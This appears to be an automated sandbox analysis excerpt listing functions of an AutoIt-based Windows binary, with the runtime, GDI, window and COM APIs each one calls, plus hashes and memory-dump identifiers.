Instruction ID: c66c5483f75f4ec8dfb54a54d6ee6d8dbda15e47bce8a67b9642f5e263b3ff92
Opcode Fuzzy Hash: ad841969b31583f8fdcd21aec31f9e73383599adb02e720ee11f8a3bf40b2f08
Instruction Fuzzy Hash: 7C31A172408744EFD320EB60DC45BDB77E8EF54310F14451EF58AA20A2DB70A648CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00DD541D, Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD547B
_memcpy_s.LIBCMT ref: 00DD54ED
__read_nolock.LIBCMT ref: 00DD554B
__filbuf.LIBCMT ref: 00DD556E
_memset.LIBCMT ref: 00DD55B2

Part of subcall function 00DD8B28: __getptd_noexit.LIBCMT ref: 00DD8B28

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 03f7977d7d918d7ea39583940a18fbc28fda2611ce32271a949a1259153da9f9
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 1551B530A00B05DBDB259E69F84066E77A6EF40321F28872BF865963D8D771DD908B71

Uniqueness

Uniqueness Score: -1.00%

Function 00DE50E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00DE50EE

Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F

_free.LIBCMT ref: 00DE5101

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 07fb2593d10d239c2972132248bdb5cc4613f07b26bd5d2ac96e4aaed38e89c7
Instruction ID: af5ce3e7aab47f28abd6d35c90e33ad1452876196185f1326ba246592dc03643
Opcode Fuzzy Hash: 07fb2593d10d239c2972132248bdb5cc4613f07b26bd5d2ac96e4aaed38e89c7
Instruction Fuzzy Hash: A011E372904B55AECB323F72BC05B5D3B98DB103E5F15052BF949A6264DE30C84096B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB12F3, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
SelectObject.GDI32(?,00000000), ref: 00DB135C
BeginPath.GDI32(?), ref: 00DB1373
SelectObject.GDI32(?,00000000), ref: 00DB139C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: dbafe8359e29ed143183c3fb5fc2b65de3c0faae98007d32c6a3b012499f5470
Instruction ID: fdf6b0ac4d43c9f1f886699dec034bdc9a6d76509aba29fb136fccd9a0a97c1b
Opcode Fuzzy Hash: dbafe8359e29ed143183c3fb5fc2b65de3c0faae98007d32c6a3b012499f5470
Instruction Fuzzy Hash: 0A216231C00608EFEB14DF56ED497A97BE8FB00321F58422AF415A62B1E3B19999DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E070E9, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07BC6: RaiseException.KERNEL32(8007000E,?,00000000,00000000,?,00E07109,-C0000018,00000001,?,00E07044,80070057,?,?,?,00E07455), ref: 00E07BD3

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?,?,00E07455), ref: 00E07127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E07142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E07150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?), ref: 00E07160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E0716C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: e71a83c3ec6e84e6e061217369fe5305076dfeac23209b30e884cf15a7270e3e
Instruction ID: 277267f24d2c48ed1bfcd0e3a86a53e7c0553e7552484d806527362222e3643d
Opcode Fuzzy Hash: e71a83c3ec6e84e6e061217369fe5305076dfeac23209b30e884cf15a7270e3e
Instruction Fuzzy Hash: D211E176A0520CBFDB184F65DC48B9A7BBDEB04795F144028FD84E2290DB75EE80C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E15244, Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E15260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E1526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E15276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E15280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E152BC

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 754cdc6fc04bace15828d34e8dce772248c9bed5367eb6ef3cd9365309fb9cc4
Instruction ID: bee66a5c7405c374a70b7560ca37c26bb6a98f9d58a9717da5f8bc494345ac42
Opcode Fuzzy Hash: 754cdc6fc04bace15828d34e8dce772248c9bed5367eb6ef3cd9365309fb9cc4
Instruction Fuzzy Hash: D4011732D02A1DDBCF00EFE5E8499EEBB78FB49711F400556E945B2161DB305998CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB13B0, Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00DB13BF
StrokeAndFillPath.GDI32(?,?,00DEB888,00000000,?), ref: 00DB13DB
SelectObject.GDI32(?,00000000), ref: 00DB13EE
DeleteObject.GDI32 ref: 00DB1401
StrokePath.GDI32(?), ref: 00DB141C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f1968bcb4102b19dcca759ac737cb354d520fad9a42cc09bf49337b659070d4b
Instruction ID: cff76120c12bf28359b4b6ae0b3bb287364e1a5e0c65fcaf8c9caf9b1da4bf63
Opcode Fuzzy Hash: f1968bcb4102b19dcca759ac737cb354d520fad9a42cc09bf49337b659070d4b
Instruction Fuzzy Hash: F3F0FB36400A08DFEB199F1BED4C7983FA4E701326F4C8235E42A680B6C77045A9DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00DC6192, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DC6248
_memmove.LIBCMT ref: 00DC62E4
_memset.LIBCMT ref: 00DC6308

Strings

ERCP, xrefs: 00DC61B3

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 14256f0007eeac9af060649ac0cb5a474b3d13f84d93a6a3544f666aa591379e
Instruction ID: 57611b972a0973aca7f4a723f5483638d761ca1b9f921ab28b09adc01eb3b623
Opcode Fuzzy Hash: 14256f0007eeac9af060649ac0cb5a474b3d13f84d93a6a3544f666aa591379e
Instruction Fuzzy Hash: E751A171900706DBDB24CFA5C981BAABBF4EF44314F24457EE44ADB291E770EA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E239E9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00E23A66

Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22

Strings

, $, xrefs: 00E23AA6
AUTOITCALLVARIABLE%d, xrefs: 00E23A58
%, xrefs: 00E239F4

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%
API String ID: 3506404897-3879706725
Opcode ID: 7ce91fc5ef0332fd371aa4614b66ada93da3832b771b64d9d235b8de6c23ad16
Instruction ID: 52fcca5ab5cf77c9c83a0f956eddb694606b264a9646c0b0c9947c60073f7ae8
Opcode Fuzzy Hash: 7ce91fc5ef0332fd371aa4614b66ada93da3832b771b64d9d235b8de6c23ad16
Instruction Fuzzy Hash: B9216F71A00219ABCF10EF64DC82AEEBBB5EF44740F501469F546BB181DB34EA45CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4C03, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DB4BD0,?,00DB4DEF,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DB4C23

Strings

kernel32.dll, xrefs: 00DB4C0C
Wow64DisableWow64FsRedirection, xrefs: 00DB4C1D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 71731b7c429144bb8257cd7ad292e274764a0b681b504f99d6786136b0504420
Instruction ID: 7df993e6873036f24d6ae4291da78876b6227a69beced0e3cde9e81f73564fe0
Opcode Fuzzy Hash: 71731b7c429144bb8257cd7ad292e274764a0b681b504f99d6786136b0504420
Instruction Fuzzy Hash: A1D01271911713CFD7209F71E90C647BED5EF09751F198C3AD486E6162E6B0D480C660

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4C36, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DB4B83,?), ref: 00DB4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DB4C56

Strings

kernel32.dll, xrefs: 00DB4C3F
Wow64RevertWow64FsRedirection, xrefs: 00DB4C50

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 9686e002c62543b3de971a023d845f48d1d58449cbddd305c88f90076d21f5cc
Instruction ID: 962828d5d4ca871932431df3a86fd32a0723afa6faf5ee17dbe5a11a0fbcece7
Opcode Fuzzy Hash: 9686e002c62543b3de971a023d845f48d1d58449cbddd305c88f90076d21f5cc
Instruction Fuzzy Hash: 43D01771A11713CFDB209F32E90D65ABBE4AF05791F15883AD896E6162E670D880CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00E0717D, Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91f1fd45d31cb9359e52011b2f3b91833762f77e8c16e55149277680868106a
Instruction ID: 616d1c2cd0cdc07e555ebecb37ab38666baa1c505d19939ca6cd1846904f5a5a
Opcode Fuzzy Hash: c91f1fd45d31cb9359e52011b2f3b91833762f77e8c16e55149277680868106a
Instruction Fuzzy Hash: 29C17E74E04216EFDB14CFA4C884EAEBBB5FF48704B149598E895EB291D730ED81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E0687D, Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E0688E
SysAllocString.OLEAUT32(00000000), ref: 00E06937
VariantCopy.OLEAUT32 ref: 00E06966
VariantClear.OLEAUT32(?), ref: 00E0698D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: bccbc86c144b9dd60d3f9a568ba8f13f1255ae7f0ae8cf10b7e78e7ff0a88509
Instruction ID: 269096aa8a4f103912998eebdca4cb86090a10efac3c02cd9217bd44d210d57a
Opcode Fuzzy Hash: bccbc86c144b9dd60d3f9a568ba8f13f1255ae7f0ae8cf10b7e78e7ff0a88509
Instruction Fuzzy Hash: 0351AC747003029ADB24AF65D891BAAB7F5AF44314F20E81FE596FB6D1DB30D8E08721

Uniqueness

Uniqueness Score: -1.00%

Function 00DD470A, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DD47A0
__flush.LIBCMT ref: 00DD47C0
__write.LIBCMT ref: 00DD47F3
__flsbuf.LIBCMT ref: 00DD4821

Part of subcall function 00DD8B28: __getptd_noexit.LIBCMT ref: 00DD8B28

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c1f6e4d92acd1f3afe0024524b436ebcbba10f513d964a5c2ac3728707dc8c82
Instruction ID: 81cb74f4ccb4b633d0739555ed6c3bedb28d1c9c3220a0ec0ca84c8eb03c7a42
Opcode Fuzzy Hash: c1f6e4d92acd1f3afe0024524b436ebcbba10f513d964a5c2ac3728707dc8c82
Instruction Fuzzy Hash: 2E41B675A00745ABDF188EA9C8949AE77A6EF45360B28813FE45987740D770DD409BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E38851, Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E388DE

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 54b3c764352b27e8444d0099e30c69cb0070c284e5f121d40a35c170879ab945
Instruction ID: 2a4071a74224086113acc9256a050f73f5906c4bbee38783f1dca1d045eaacf3
Opcode Fuzzy Hash: 54b3c764352b27e8444d0099e30c69cb0070c284e5f121d40a35c170879ab945
Instruction Fuzzy Hash: E131E330600308AFEB289A18CE4DBB87FB5EB85314FA45112FA59F61A1CA71A940D792

Uniqueness

Uniqueness Score: -1.00%

Function 00E3AB37, Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00E3AB60
GetWindowRect.USER32 ref: 00E3ABD6
PtInRect.USER32(?,?,00E3C014), ref: 00E3ABE6
MessageBeep.USER32(00000000), ref: 00E3AC57

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e395914a7c43b07d89924c870b2a946a6c8b36213811582453d960cba9ff944b
Instruction ID: bfb4dd261b22eace17e5de427f54dbcbf51b38776de4a78969cea7efbdd2e736
Opcode Fuzzy Hash: e395914a7c43b07d89924c870b2a946a6c8b36213811582453d960cba9ff944b
Instruction Fuzzy Hash: 07418331A00119DFDF15DF59C888A99BFF6FF45300F1CA0B9E494AB261D730A885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00DE61C5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DE61FB
__isleadbyte_l.LIBCMT ref: 00DE6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DE6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DE628D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 042c22fc6bc400dd353252582f5aff1661323aea8c42c87252116f2a884cdf26
Instruction ID: 4ef651a8626ac0bc1d9be6af4d67dcc38b6e3f61c2802578e3543e286802139f
Opcode Fuzzy Hash: 042c22fc6bc400dd353252582f5aff1661323aea8c42c87252116f2a884cdf26
Instruction Fuzzy Hash: B531C030604286AFDF22AF76CC44BBA7FA9FF51390F194029E96497191D730E950D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C498, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

GetCursorPos.USER32(?,?,?,?,?,?,?,?,00DEB9AB,?,?,?,?,?), ref: 00E3C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DEB9AB,?,?,?,?,?), ref: 00E3C4E7
GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00DEB9AB,?,?,?,?,?), ref: 00E3C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DEB9AB,?,?,?), ref: 00E3C56E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8083cf2ba0b89bb39542b47c8747395fe9852c9938e0b5d95ab9f9ecfdf1ff2e
Instruction ID: 907b27a2a862d1fb7b1e6510a29ba4ece5954def3d03af2706c6c4921b33878d
Opcode Fuzzy Hash: 8083cf2ba0b89bb39542b47c8747395fe9852c9938e0b5d95ab9f9ecfdf1ff2e
Instruction Fuzzy Hash: 4D318D36601058BFCB25CF59C858EEA7FB5EB49310F144069F90AAB261C731AD50DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1290, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

DefDlgProcW.USER32(?,00000020,?), ref: 00DB12D8
GetClientRect.USER32 ref: 00DEB5FB
GetCursorPos.USER32(?), ref: 00DEB605
ScreenToClient.USER32 ref: 00DEB610

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 8a91342a3b66ea5bc5a7221b07d6a59d5d042b25587d1e42e1c4f4a9fa556edb
Instruction ID: c7b35d4cbfdeefb6c6010954607cbcc10ed31acfe183de467fc2822ce254bfe7
Opcode Fuzzy Hash: 8a91342a3b66ea5bc5a7221b07d6a59d5d042b25587d1e42e1c4f4a9fa556edb
Instruction Fuzzy Hash: 5111193A900119EFCB04DF95D89A9EE7BB8EB05301F900466E942E7250C730AA558BB9

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1D35, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00DB1D73
GetStockObject.GDI32(00000011), ref: 00DB1D87
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DB1D91

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 9fd0d0486db2e8923ded93d202dceb0eec767e1afca7210923dbae6cb7b11b4d
Instruction ID: eebb1de74f36e47da6132f3fa39aa5db2af3d8f02c97a29aa945e08174bdff1e
Opcode Fuzzy Hash: 9fd0d0486db2e8923ded93d202dceb0eec767e1afca7210923dbae6cb7b11b4d
